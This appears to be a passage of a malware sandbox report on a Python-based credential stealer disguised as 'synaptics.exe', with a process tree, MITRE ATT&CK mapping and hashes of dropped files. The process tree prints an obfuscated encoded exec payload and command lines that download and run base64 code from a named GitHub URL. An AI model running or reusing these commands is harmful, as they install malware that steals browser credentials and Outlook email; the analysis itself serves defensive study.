t#gqID9AndIZ;r>5H%8%i4>)al~v87)G3>pRL4mV6gz6i4%Uxwum2!0;hifz5v+SrP3#kXH>MYlJ0V*d*|%wyy'))))
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4188
- C:\winnit\synaptics\synaptics.exe
  "C:/winnit/synaptics/synaptics.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|e;>vr2lk|se?l4bc4=V~W28ON8goUs=GNl83$G!{vK6exhgr2(?f&d9h)AkhFJ02E1t${)|3oj?0y-yr!pZ?I3X55PCbE9|fBhU9VLbM`EG&{gQJZgf?BRp^3U_~2K@*K2$wVX;tf3QiFf;1w;xVooVY<+KD#IW5C-PAjmI(>1u3({;F>(+#+h(;M(cPB-CZPH)1SIo*O=IlTpMVM?Lf!5w&~NS;|jRB#vG&G|C=D7Xjj1s}tY^ZN?=B={75n)7Suv*2_1dCsq+FM|8<e((T32)=}0=6xIJtKfI=cR7Cp{XX~_ex381=nug|_%QeeeiJ-`kAlbWaqt8_$;WP@r@<fLAA@J`S+EVaao?8v+_~jGKP@}AojZRk!*89t&PRVMz&|<noR2Ym;e6tJis?(|Gv{+m|Hb*jxsNIBQa{~w9{gN{jPs@Q74BhO+WDQ!yrp2(W!>uAB3`|y7Pf!?3-N%oU0i)+$F7;WC-x)^T{|63Lfm=7+Nn9NJ#pM^YE@1=lUd!2EZ;e0PrSgiu|)aUOg&83uEk2L(gCNg%56@qt~QT*EtNUxA8^N5q@<_^nA~f{izo$Q6i-t8pthNs+m+SYY!o^Ott!?cc28HIUhifaj>xhn*7Wq$jaTc@WE7^DxoI3qJdj%2@R-BTth9~3(q2`JR`)<zmBFE;tv0VFE>bsHt;KFSjYGTmE7%dfgs&EX-X?C+!cWCz;b&}?e-tI6Z-z$JYLh4yM6sJB+r{`3EccH>d>@nl*?5(t@hCjokH5gTx5zRSZZ?bgy-oe<S?l=Pc=xRT&YzVQo#I>kzoZ=MvUFCsEMN7s3xE0gva&2Ksb%GU;q$_>xU8hq5|4aVAomWYmt?ebzi=f(QG~uCccoW_^V<$pE?icyOaZU;@^WoiaZ1<oezorZx6ZQsQ)#)jq^`!U<gRAjFC1Vi6$|IJw7e|8B`_*WzYu%IMAu)4VX;TcXq2R@N^FK_?y7{`aJ6PeksCV1$Ji;`>#MSZoxdvi?qXF`SH<zFG?}KW;%HU2Ju}X&eAPU_&8igJwL8Rs<Zi22#{Vtq55=#F8^sN3t9ZBgp!gW`@%D$-uUucb^=r6U=IQ0%sQZOW3iCM0<a{YDjEl=6Zn4%5^&h3na&CnZ!Nhh+`sFUsthlO#lhAgz%kg@?t<asVHpG6LJK+unt96VQ0`Toh{0-UqBhq|J1UKzb<hgO`&ePS}75|}%H%&J=xnAIFvfGVZ)ve;aB8C<7p<>i^_AI@#N?Q2$!YPK4L;Y<d#b73IA|T7R{~Pp|u2K0hnfe$vXV@x#x&5!yB}U|u`g?)c;qQgF*Z%%b>YP%qc8a5bYz;>p^^%VNNVZ+H{!zSA^t~#ZuZaIi=<Gjv7aETX+2`{~{PGo=*d|K$U%r>wrs9WW+6_0H25yXFANRaBV7_kcJrwXNkKe8OpcwCdXqnQlUH;%YxKj!{v-mUq6BU0dUj=*oS&rBE23h@2q}j~(KMJBroStBC#xHYy^X=gL7mqGTY9grJj1%+Z|8ON4x^^WoQbHVcm$>n}4>x<O@T*Le72ao}OA1Fmg>wYP;6D*t#{4_PR?^b4jB^8pqnx|~sl0a`^ORG{`3=mMoN~_J!0}pH-oVnEX=S;&+`!z;bZvQaxsJK5<raoXMT);9Iy@(l{0Gv|MEUjAnq?;LP7S{j_Uc!;K2LMGHaRkLC*;AmeQWhGk>0DHxFL~rPVzv%Lrn5(^WAxuS>H+A#`45q@9sY$Gv4=+Ik!lN{IhGdg_p2K;q~A;P7zlO2FMjd#PfNi=l#4}MDqRZ?Q2h6Klnpu-u4z&JaXRolNcu<+HX=DI0tPNH%lZ)2_^qB6^nTA;J<M69;tMCq%ti9ID$56s(|Ls051r-&jUqm9x1w?<}z|5sQ~d7>j<*XH&t3{0-!e?9m}Ff>+}4fW-z?#^E;+r=WXCAR%p+9izHJ5Jv4*KLezC#q0i=8hNlL#g~7po3&BIZ8%?Z^H&S`8CAK|ab7=>#k!*AY)(*U;W=I_)L_>)KnP>>cQKoczEPrfpil^|-*hbC1Mb~w++7uxzq$-#6^Z|sn9%(WoT_~-j?zHx3Xe4vja7@)mtGec#AJNLW-D;>N-(2YaY#|{p);Z@~M3Z{Iqnw+(H@DRWw2{O^!(S)|(M+P}g3St&)p7cUk54PU7fUP;rA1PeI(*;a8l31K&MkJYYV(SwXif$g$sf{U)dZ3zcJ=BIAWpBMx{0DX)SS45nnPLRW-@9X89<x^UWv`NW7u8DDpk(|9X%BT*m1z5HXNlxIfFdtHUothkkN(1Vdz}ggQj9(UIr-=LpZUjlio1&e6elM)q!3$IIk~dP=p+>f{s{|LXI|&ghZ}kDmogd9l0hmyr6KrA_Jjm(PtM!nol%3I)Yt3P&L>Fe$-awhz5)<_BEaZew~pS;oKezP&5GRa^7qR8m!Kus?ABJ*=@E(dOp#RBwL0fg22hNE)1N3f`(%!bE=1|srfASwciT3#V}AZyAx$#U}Ia>SlQqfD$`WeE~r_w!^#X4O<x*gU8eZ0%^G@iXawHGL|9(~?@AX^ajfW8h#>U!`cU2L>79n^_%b81k?4Yyb~v;ELE6W52-PZ7Z8{o*HahQX2Mp8zYmA*8qw6!q0I;BwPPA4!H^<UKZS%1?kW^?0t)p2~vkj#7n8TXRg1X8k7rhK7_CTt_w!(_MgbZGad#pIOJJJxto;NjgWCsqT1u~;n0jqTQt}|$&UM3ApouArBzG#I_S#3L}#5;l3mS_4vI5stJZg#o3$w$7edpux08Dmp6yTZcaVGl5hu7mnQ1IUvWd$bkmfmIb)VDJ;O<D@F^d$Lg%ERMfWXrZYE${`N&%nYTDUe#w}N0?dT;f3he*kR`BG7a07e|TX49OG>XnVjUAnLV@UJ^F~|FM2ebsAI1q%aa8}b`7?D+8jh<m4g|^-W1zlEE)<Ub)!&c({qLQYkFrcJDhF~8J?CyhqHCvlo0G-Jr=f67xgZf8J+nY8jV@Y*Q<a=J4#i728vRgJGxdk@+?koiJ>rpyomjTG!fM14)Uv7=o!#Y2N2YOQq{o_c%jizFn*nu4C=TiO+ja`XBdq{Z8aj5KbWgQI>wmFAj8dIpmZfpnoA7cldjZ72In>2^DSSvFnm5!tCN{CN)ub>k4&HEaXv^O%Uui^KQ_)H>|e#lm_)rQqBUQhTUCF7q1bc-2AH8RRT+8iw2`b-rJ7{;<eI5K(RwVp(1RqiX&6bGT$g;<vfF4Vj)k-p;$DVlRNfJXG?N(}=}76ML7#*2(3c{8JgoKAMj*9e<SZH&@SSfpFA-^7mqY1TWW9ydL8+_jfolloQYQ8!pfCDud4Y4&LSa)$X$zt?&{-)I`X;Ziy4LJz<ECIP((I^;rnZJcjcyn=6VWPn#+bCHOBr9)fE20>YU)*S;mo3rtnrzGU<BLE9nokUOPQd#2<`wM)&VUts?V^NE;GGMW<W<UE!N8*Xp9}rG2DQQWh4!xAX3$~B5Ft%RR-#<0CnX68VX$pCgO3-Gjm66>{zYFOg0)_S(mDErVNKhqb?5wy|16uY+XrhmY-ld3WmQIE6f?Ku|j}zbf6${X7Q7r13cdFBkhQ`S=mQOY7gr;rZgKk?IXH2*Sb;{<9i2NCDAm0E^5kD<%h8pMhmSfFru#<_VN3pM+--CDAYtFm9<$E8UbUPSVx&Y#Q1CuB^FfOP-O7?AhC2|VgVf212mM;kg<^>SqzU<gFgp4n&};d*Y)9rJW8h)?ahJjbc{eTa4a0_*wzMq&sv()HOEa&VVV<*V>G}?-Tpv~&5pNY8Vb;vgR0Z1)eR(!EnU)7A1WqLCIF-(n`V54hclVBakV4%L|Q;5fQrMz0O-P8)e)mIXY+n1I#htiX~CQpLw$}hUd6slUF;p$sb6TBe<5XuHF=SCf#GN-e*fx$ok>1F@693{BdBg@0zOXgvK2%?#yIZto~&n%uj^1Yd>!X7D2SbgF8gUs)g{nxLt6IXv1v5)e*3J^8qxWALjiT}kQX#rZOXt$hO8_6A(!%odNux=Vxe+fXXFP|7B}PoiVBy-oRZUY@h2)ju;PM}6ijLPZQ*B%luvI9<l6>5SW;469pb`pJuu_MGjXk-E+Sl<SJ1?ClGPSJ4fF2~8tz@KpP`9`YlQ6zyiLl*lf0VG&t?)imi6;9cHTL$#;%>hEq89aQ!IIk*ZJ@Ow-!&s(2d*gYASLNzfBI~8on`~;nTSN`1Ny{HtR1Q8hyzI&pqQwcCZU~In;Icl;_{|kKAW(_OeUvK<T+ZY)h=y+l^aC>i(?0n8TsB;A9km?#T?Yjrv*l@XyTm(?mKOMosJ0k2^`{bu{-M4KA4W4@~cj)@cpw?ke?@r+=-V1qTyx(D>ox>9_L1Yq9>~#o$CV7JV+08-IQEgzsKVWwCo8gso>Mz479S++}w_Z$JLAfy^XT=v}!r*tfHRqb{L$dVV3EstxcccodzCnQHdr&!acb&(7Zr_iCIrr$e#NA86mwvLnfdVsh*@tyz5>hv2;4Yh}-DdAK`1KkFz@o9O#Tr%fS!ojjG_?Cal)GxG=88SM7shp$BY;gcSC(ZxaZ<f*xTEbr|Oo7GYBV=QgId6Rh;myK^n2lB(@d)06b^zXjYf9O8k%lIG7$J?)LgMESD4Pu>tbZ~S~-@bUVCxr0nj=T4I^gVxmD97HL`b3qio}AQ=#d+B7Wny|5dC$&{mreI^_au6Zj@piLoH=nKK8#;H@q=c4njEqiN3S_{whywQTJ2Ba;fr(OxU)YSiM<KEJKaI!z0*d-@9(qzE<B3i@h(bVNKNI@UxS*d4iY!jp4Ddj@>zJ=tv{|kYfWm?xb-l|Y}KS6y*M$e?EZFbMNJY|9w(D9-pA;H>&ZD9rEV3jCEhe0A-EB{=TkRHu@ph^ii%yho{gf@5pq}5XaYAdj@@(=xT`YxjJDcLrdAYBY+MP&pOYnT%v>v(*uI;_Bo1RLe~xD+9vWFOsTJdL-W8c?-bEr5ei1FqBxGKasIXt+0`28>p%$-^7`T;xc$>UzUDd0k`j1I0<dyI0?)B*L)IuY>hpS#v2E)zSD6F!1)f3;$BgxLAHr^sLN#z>fCJp&86O->F@XnRMOFZ#P@*^^Ik2K_CLtf@zm5$rLEgkbpk`zvHgES;ESLJ;F?}Pb$L~pzbCe9SO`@}#AsmP-IOUd255c?!=zryq$wLxv%-KcDoHcFfKH;S8;E$V*(;(b!Z'))))
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qlw.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\winnit\qlw.exe
      qlw.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1536
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5084
      - C:\winnit\synaptics\synaptics.exe
        
        "C:/winnit/synaptics/synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://raw.githubusercontent.com/merrylisa79/pk/refs/heads/main/LohgchbeKha.txt').read().decode('utf-8')))"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3612
      - C:\winnit\synaptics\synaptics.exe
        
        "C:/winnit/synaptics/synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://raw.githubusercontent.com/merrylisa79/pk/refs/heads/main/hVthcKhaYbmo.txt').read().decode('utf-8')))"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\winnit\synaptics\Lib\site-packages\pyasn1\codec\__init__.py

Filesize
59B

MD5
0fc1b4d3e705f5c110975b1b90d43670

SHA1
14a9b683b19e8d7d9cb25262cdefcb72109b5569

SHA256
1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

SHA512
8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

Download Submit
C:\winnit\synaptics\Lib\site-packages\win32comext\internet\__init__.py

Filesize
135B

MD5
f45c606ffc55fd2f41f42012d917bce9

SHA1
ca93419cc53fb4efef251483abe766da4b8e2dfd

SHA256
f0bb50af1caea5b284bd463e5938229e7d22cc610b2d767ee1778e92a85849b4

SHA512
ba7bebe62a6c2216e68e2d484c098662ba3d5217b39a3156b30e776d2bb3cf5d4f31dcdc48a2eb99bc5d80fffe388b212ec707b7d10b48df601430a07608fd46

Download Submit
C:\winnit\synaptics\VCRUNTIME140.dll

Filesize
74KB

MD5
1a84957b6e681fca057160cd04e26b27

SHA1
8d7e4c98d1ec858db26a3540baaaa9bbf96b5bfe

SHA256
9faeaa45e8cc986af56f28350b38238b03c01c355e9564b849604b8d690919c5

SHA512
5f54c9e87f2510c56f3cf2ceeb5b5ad7711abd9f85a1ff84e74dd82d15181505e7e5428eae6ff823f1190964eb0a82a569273a4562ec4131cecfa00a9d0d02aa

Download Submit
C:\winnit\synaptics\lib\__pycache__\_collections_abc.cpython-310.pyc

Filesize
32KB

MD5
a19fc983644cb332462191b2915ba9a9

SHA1
a7c369ac2055baad9f67ca0d64d37bf3f7d073f9

SHA256
65528169e9481bedee8d6502eac16c1f8ba302d8e397bfcaf982004806846d10

SHA512
b7f99b8baa46ea70f3778a9251b559e9a1c594938b732b03d3ea68a8520ec2205f4c08ab6a633df972f801216aecd730fc0bc33f97515754e8ee79f8f94d2132

Download Submit
C:\winnit\synaptics\lib\__pycache__\_sitebuiltins.cpython-310.pyc

Filesize
3KB

MD5
2ed29764bab09cf0b6d3f73fb68e677e

SHA1
68b6d1137c885ce8d50dae3a785071a383b5f56c

SHA256
9a31630937bdc78b970426d6250734f40abc8157676050288da26e0183cff93c

SHA512
3ef1d43bd3500d414603ce6e8f1fd048e2b09ada07c10c8659054eb935b46cdf3c4ebab5cc70db714a8c6a4c6ca695ef7ca48d1f74ea851585370d214fed8176

Download Submit
C:\winnit\synaptics\lib\__pycache__\abc.cpython-310.pyc

Filesize
6KB

MD5
90400b205e20c95b1095ddeda8660025

SHA1
1545ef6360dde27196a2a74c32798028498c6df8

SHA256
85d16ffbb07d970c3c413738dd4a66cb0e7287eb8d6b57c9c1e39c9da5bbbfce

SHA512
88d841c8c1df4d1ea6558380a2a4b864d2229276e34c59b15e5ca627978d955342dd04722bb1d114efaef6474a06b3371b54e1bf72efee21a4f57b76919216d8

Download Submit
C:\winnit\synaptics\lib\__pycache__\base64.cpython-310.pyc

Filesize
16KB

MD5
890ce319fd1e123f341200c1f8724354

SHA1
134f76dedbdee1bf940241f32783e17710c75ec7

SHA256
d2a787cd9d3d2a150c9cc5d8fb5e6f971fa5946fbd107f9158421d30339626b2

SHA512
f1181d6a5473479f94b5a9a2eeea788b975cc1ffcd5e53e5f797f8f95a0fe03b72adff3fd98f6d6a17412e2c7d8ef615e75bf78cd556579fe356a3b591d028fe

Download Submit
C:\winnit\synaptics\lib\__pycache__\codecs.cpython-310.pyc

Filesize
32KB

MD5
6563623471acb5f60efefee3e0f91595

SHA1
9bf6024ab66c548e12d5373fa9f1ae27c951dbec

SHA256
9a2ffb71650015e58019f0031820a1404be142c77568f496270bcbac67924928

SHA512
dfc57cccfe395cde938a8133596cbce5c757904a7de2bd6bf6ca96cdd34de1b7abb4ec73e60a7932be4b0f91c7db6ee57f379a059046071194470f6e474fafea

Download Submit
C:\winnit\synaptics\lib\__pycache__\enum.cpython-310.pyc

Filesize
25KB

MD5
106e9efbff74e93fbec1eb91257afb04

SHA1
1b1bafa0709d792762a3278a937fc1104e6e84bb

SHA256
6d25f1413f96b889057e4c0b808fd70fdf39d498592e7586480f6de3bae131ab

SHA512
ea72dd383001bf82297d65d8b49876b8d5bba278f7d2e2d7c7225511a530d85f598094baf23b52fec516b949c7457e62bc7d6037165563209acf08d2b3108c74

Download Submit
C:\winnit\synaptics\lib\__pycache__\functools.cpython-310.pyc

Filesize
27KB

MD5
17c6adec6cf082405f6319aae17e562a

SHA1
e419a3647523ec9a400e185ebef60c48e6356f12

SHA256
12e95e0d824ae7a34f30d3934c7b9ee817b70af62aa9be6f29aaffe0424ae4ad

SHA512
61af70d38275b96ddb928b90fa7f9e62a87ae979218a120d026143b4563badea71308b8d054c4506279ff87e2ad119b6afec6ad97101ffa916a004bf5545362d

Download Submit
C:\winnit\synaptics\lib\__pycache__\genericpath.cpython-310.pyc

Filesize
3KB

MD5
986f18400fcda1839c666793d6be1b8c

SHA1
fcbf7f3f5bba2f15063f9d6f1b655909bf54b8b4

SHA256
ee127f3ed8ed72e8ffeed7b9ee380d64757bc3735e39a8a772c80889ca6a3aa4

SHA512
a970b9d7c07b56d00c861f3840f1fffdff1db5de3a646deb4ed587fb71612c75bc37ea3958bb3097f87eb3fc1479668c1e1c16ba2c9f7603c75488590b7378c2

Download Submit
C:\winnit\synaptics\lib\__pycache__\io.cpython-310.pyc

Filesize
3KB

MD5
197e2d9f6cc392250e902525f46e3ce2

SHA1
227f9ed6ba571331ad6c48eb41ab936a3c82bd57

SHA256
24801d164699f5110b92c89eacecd2cccabb6194e5c1bdd24d6637cdc47c7c72

SHA512
42407274d9e55e31584c5abb25f8abfaca81779a6cc988c11aaa26b50581da132d78534a77f62e3654ee3b32121c71800241f5a7cf472070a9d043020e45350e

Download Submit
C:\winnit\synaptics\lib\__pycache__\keyword.cpython-310.pyc

Filesize
931B

MD5
ddec67f0828ae9bbd013ac625d98237c

SHA1
35d67addb589660b843cd905b231c64680b1b4aa

SHA256
d214b5a35b4ecde8af4118b630737075ceb4ef586ccb01a8fbc32d35ed701716

SHA512
e8672855203be46c67478a1f9feb52398ed5aeac4480bf8aeca7e95bc056771045fa49e6f07ecbae5f9e742820939e246640e7fb83240969095c16a098dd0307

Download Submit
C:\winnit\synaptics\lib\__pycache__\ntpath.cpython-310.pyc

Filesize
14KB

MD5
68bbb82e48a74e3b07c92b5e2fdd1a5f

SHA1
ceb05eb7bdd1c84298f9d424d26edc2c87270227

SHA256
b6a678ade0cfa41526f91c08d0cfda38b4c88fbfebca973a65a0ccf20c991d08

SHA512
7ed2466441b340170fa2d5b2398d7f7dfd3d2140440509499a4b843465f5a8d6168bfd9beb4209d9b76bdf608e2e871df0feff06451eb17ab590e2fb65a5a402

Download Submit
C:\winnit\synaptics\lib\__pycache__\operator.cpython-310.pyc

Filesize
13KB

MD5
a0826675d1fa0b845c45b647d1a33f98

SHA1
bb92054af0a8046adc1924839dfcdfde61138776

SHA256
a627d7c927c0bb1920ce660eab72a4fc08a6d11578157bf3b673be1f21bc6f5f

SHA512
701350a935aa7fb4b281bfa18a265e8d26eb0d329dd7002fc7eafbd55984447b50a7facbf27c714536f361ab4ceb7c5ee3a1bc53ed5ad1174e504a56771b3218

Download Submit
C:\winnit\synaptics\lib\__pycache__\os.cpython-310.pyc

Filesize
30KB

MD5
b5c5d46b91d2a96a9ee8a700a5091a83

SHA1
31c3fbbf8b670c8d935f8cc66119af3c4585cb39

SHA256
36ebf5b719b5f0400f1056f0298f5e6ba32b38a140d2d401e8348cb47749f9df

SHA512
a008293569e4184d0c028912e49424a6175a43f2cfcf784a5dd726dbe86cd27d75e7af88f9f8d4e7319b2a4008b39056b34197b7224e0e51bb15db027742e654

Download Submit
C:\winnit\synaptics\lib\__pycache__\re.cpython-310.pyc

Filesize
13KB

MD5
a352e895ca7480aa37d50361fb7442ed

SHA1
67b39601c9c421c11532a678ac05c46854ee3a07

SHA256
3a9d8e6efbf7979eec72c1d4e426b60b7c7f1534fccc256f5afc32cf41da1e9d

SHA512
dac398994eaaa8a3ad65c2151f422410d2c09e62cdb81bc96aa01e010d4dce9a0f7f2317b82ad1e29c8803c33e6954e7e874e5cd800e16b9698bcc7fe8495aba

Download Submit
C:\winnit\synaptics\lib\__pycache__\reprlib.cpython-310.pyc

Filesize
5KB

MD5
b7add2ee4e5304c84e2f237f00fa1260

SHA1
4074573349ca5a4e5a4ad923e1ae3f01fc561cc7

SHA256
a1288b89e713bccfec4b3a83ce9ce79b8258858ae141c64bc8564f7918d87abd

SHA512
4ceb61ae500c625cc15f794b400581890a8b58261165677ea8c5256ce201ca98cfd1cb3d4fc311e77453afb0c388c7685b7e47e9b9d9b1c5e3a1c85ab0b745f9

Download Submit
C:\winnit\synaptics\lib\__pycache__\site.cpython-310.pyc

Filesize
16KB

MD5
03d08b7da043b894d1be4b22d8b72396

SHA1
d68e3271e705107202f6e1c1d1f72bf6b1626b0a

SHA256
6c0ebe181f8415e5ed5a25acdea6f9145c4d66d1a9f9e38ed216e5a8a5d069b1

SHA512
670b5e59a95ff0d9615e7d53659cca85db7a8764d906aeaadd584fc302f329782fd7624fcf3b73c98e09ec94f18580e327c23f5882f833b9e2952f2bd6de42b4

Download Submit
C:\winnit\synaptics\lib\__pycache__\sre_compile.cpython-310.pyc

Filesize
14KB

MD5
752ae0a1d54a6b3c77b9a2da20491f1b

SHA1
10e77249ca4b7e28f4591d8b9cc91ba4b3e804ca

SHA256
377a569edf2743684b5c5985a136878bb70d69eeffbdad5514f3037a33969858

SHA512
c76a8c314bcdd2d673ad3e03369353c679bd3f9f581e9b1e608e6a20249bfece56b5937b6e58380dd6aa4c2275f59f6497b916e454296082dbbb8bf7e0dcbd30

Download Submit
C:\winnit\synaptics\lib\__pycache__\sre_constants.cpython-310.pyc

Filesize
6KB

MD5
b076d3a5695def7ee6a53b459531c97f

SHA1
85c276bdd4beeb8402d177178443e87cf8c371c8

SHA256
c602ff8641a1232fcac05bebb21e8bd9ca61bcc6b05b1fa97243cd039b095ef3

SHA512
2b359887cb4cf2a20d55fb2bd4d4819d84af0089740c8030a6e2b958a3a6e905bb1cada1ca8f794cf8b4596cc47d29a527c44a9a9d826ef25b149a19d65a6109

Download Submit
C:\winnit\synaptics\lib\__pycache__\sre_parse.cpython-310.pyc

Filesize
21KB

MD5
7178505df2ad505f7eb7095e4d14dc3c

SHA1
cf6a0fd62366851061cae3b0b01c36138d7efae0

SHA256
97bdf56714aca1253b72cc13b3846319e7796fb0f243cfdfcfa237de5765e291

SHA512
cf433b9aa568bb5bb9f4e219702c3fb3da9f6fa6e6368c2c06f48ee1ccfe828cabda29551196cce2458bb5c464fc6b435f0f16cb230b3bf65c210c64c7c1775c

Download Submit
C:\winnit\synaptics\lib\__pycache__\stat.cpython-310.pyc

Filesize
4KB

MD5
57615cbdc6095de911f45a6687528945

SHA1
1a840540f2c5a2d58805300aa16517bc9b88f590

SHA256
274bdaace9cd49923287b72b33fdce894740f43c6fcb7d7f0fd0f31943b40376

SHA512
3358c97f04252e7c0d58bba9a9484549f5c58d793c395f4e8e644b8df015a3cea14e1de296ede770e47ce711abb21be87d182659dd2902283b0feeec3db8a9b1

Download Submit
C:\winnit\synaptics\lib\__pycache__\types.cpython-310.pyc

Filesize
9KB

MD5
c76b713e204b8a724c557feb265c9ccf

SHA1
b3d1bf2ad65fe65f6ae239e322d8b651c5c01003

SHA256
fc89a717a8680e120222c524708ddfde2ef1172f2a506c0d43560cf50cedf96c

SHA512
48ac66111cba57ec74486804d0a2388dfda9f5efe58be4fbebe3682eb74e74d11c5f168657b9ffec87935b4c0001c0ffda859cba6540538f42781773ed1c153a

Download Submit
C:\winnit\synaptics\lib\_collections_abc.py

Filesize
32KB

MD5
faa0e5d517cf78b567a197cb397b7efc

SHA1
2d96f3e00ab19484ff2487c5a8b59dfe56a1c3ac

SHA256
266ccceb862ea94e2b74fdda4835f8ef149d95c0fc3aafe12122d0927e686dd3

SHA512
295601f6a33dd0e9c38b5756bfa77c79402e493362fb7f167b98a12208bac765101e91a66398d658e1673b7624c8d1a27f6e12ec32fef22df650b64e7728ca8d

Download Submit
C:\winnit\synaptics\lib\_sitebuiltins.py

Filesize
3KB

MD5
2e95aaf9bd176b03867862b6dc08626a

SHA1
3afa2761119af29519dc3dad3d6c1a5abca67108

SHA256
924f95fd516ecaea9c9af540dc0796fb15ec17d8c42b59b90cf57cfe15962e2e

SHA512
080495fb15e7c658094cfe262a8bd884c30580fd6e80839d15873f27be675247e2e8aec603d39b614591a01ed49f5a07dd2ace46181f14b650c5e9ec9bb5c292

Download Submit
C:\winnit\synaptics\lib\abc.py

Filesize
6KB

MD5
3a8e484dc1f9324075f1e574d7600334

SHA1
d70e189ba3a4cf9bea21a1bbc844479088bbd3a0

SHA256
a63de23d93b7cc096ae5df79032dc2e12778b134bb14f7f40ac9a1f77f102577

SHA512
2c238b25dd1111ee37a3d7bf71022fe8e6c1d7ece86b6bbdfa33ee0a3f2a730590fe4ba86cc88f4194d60f419f0fef09776e5eca1c473d3f6727249876f00441

Download Submit
C:\winnit\synaptics\lib\base64.py

Filesize
20KB

MD5
430bef083edc3857987fa9fdfad40a1b

SHA1
53bd3144f2a93454d747a765ac63f14056428a19

SHA256
2bdcb6d9edfd97c91bc8ab325fcc3226c71527aa444adb0a4ed70b60c18c388d

SHA512
7c1b8ea49ba078d051f6f21f99d8e51dc25f790e3daff63f733124fc7cf89417a75a8f4565029b1f2eb17f545250e1087f04ecb064022907d2d59f6430912b3a

Download Submit
C:\winnit\synaptics\lib\codecs.py

Filesize
36KB

MD5
8e0d20f2225ead7947c73c0501010b0e

SHA1
9012e38b8c51213b943e33b8a4228b6b9effc8bc

SHA256
4635485d9d964c57317126894adaca91a027e017aefd8021797b05415e43dbb4

SHA512
d95b672d4be4ca904521c371da4255d9491c9fc4d062eb6cf64ef0ab9cd4207c319bbd5caabe7adb2aaaa5342dee74e3d67c9ea7d2fe55cb1b85df11ee7e3cd3

Download Submit
C:\winnit\synaptics\lib\collections\__init__.py

Filesize
51KB

MD5
4f8c270f0ffe58f5c0bf455403ef3f44

SHA1
8c0de07c711cd9486a3ff0d2fc8a5cd4c13ae01a

SHA256
2e5f3a5a7de17bc2b2e749f0d2a1387de2280a0824856360a041b2ca75e77194

SHA512
418971a91d03756a0b2790286f67135ee386aaa0817932130ddba8b68de601d5e29a3dccef1d965bae22e66606c0a3132d179abec7e9296b715e1aad1e6bdfac

Download Submit
C:\winnit\synaptics\lib\collections\__pycache__\__init__.cpython-310.pyc

Filesize
47KB

MD5
958237bc15997033c1c31ab0e26e6376

SHA1
0691dde4750a17715f9195491cc6e8a9bd7450c0

SHA256
1851cce1ee89ae41bb81dec6b657f4e46ddefe1b84796f0b8cc06365f0442a79

SHA512
671598932cd361e0ec6f5b764406990db7e59bf6379fbd2ae7d377ace8d13ed1aa51393233c5ad801c6b15aa8446702f0823da6b08e60b77b2427d1cab8d9e87

Download Submit
C:\winnit\synaptics\lib\encodings\__init__.py

Filesize
5KB

MD5
7e6a62ef920ccbbc78acc236fdf027b5

SHA1
816afc9ea3c9943e6a7e2fae6351530c2956f349

SHA256
93cfd89699b7f800d6ccfb93266da4db6298bd73887956148d1345d5ca6742a9

SHA512
c883b506aacd94863a0dd8c890cbf7d6b1e493d1a9af9cdf912c047b1ca98691cfd910887961dd94825841b0fe9dadd3ab4e7866e26e10bfbbae1a2714a8f983

Download Submit
C:\winnit\synaptics\lib\encodings\__pycache__\__init__.cpython-310.pyc

Filesize
3KB

MD5
9bfd016088b77b89c5e523263e4dcacd

SHA1
91669987bf411a24a05c95b46fdd68d8edf00a45

SHA256
0fcfad7e3d15873d9c9c0d68ea84eb9c770cf08a8b0d7e52b4d9cd58b4ebc90c

SHA512
9301e67c7bac84ce2837e1ebc5232340ad6b5365d6b23ae0503809b7ba4b618c0e79e5f6303d12fc9125b2d5d37370b6dd5ed578babdaaa8de38507739fd5b03

Download Submit
C:\winnit\synaptics\lib\encodings\__pycache__\aliases.cpython-310.pyc

Filesize
10KB

MD5
b4da682f9651d7479da339af614028b8

SHA1
9733af84917d50dbcc207cc45cf781923c5f6315

SHA256
60b83f6f5956f4c10cfda212056bcabe8999981b4108428f8c38590c47bb074c

SHA512
3ef2abcbb2886a24e686da6d033248c2ae5832ae20f1ad2cec9041476ac9bbe32e24dc8fdba0c4bc5db07b2bbfe00d09d5b7d9a07065bd8376d6e33bf8b783de

Download Submit
C:\winnit\synaptics\lib\encodings\__pycache__\cp1252.cpython-310.pyc

Filesize
2KB

MD5
db07c7be680877babacdf4a5039c4c9a

SHA1
474ebc9b5d0c45ba3d2532a62172bbecb5f0612c

SHA256
3739c0decc9fcda8efa2b9a043dd39a2ea98aea93cebf26280a437629d24da54

SHA512
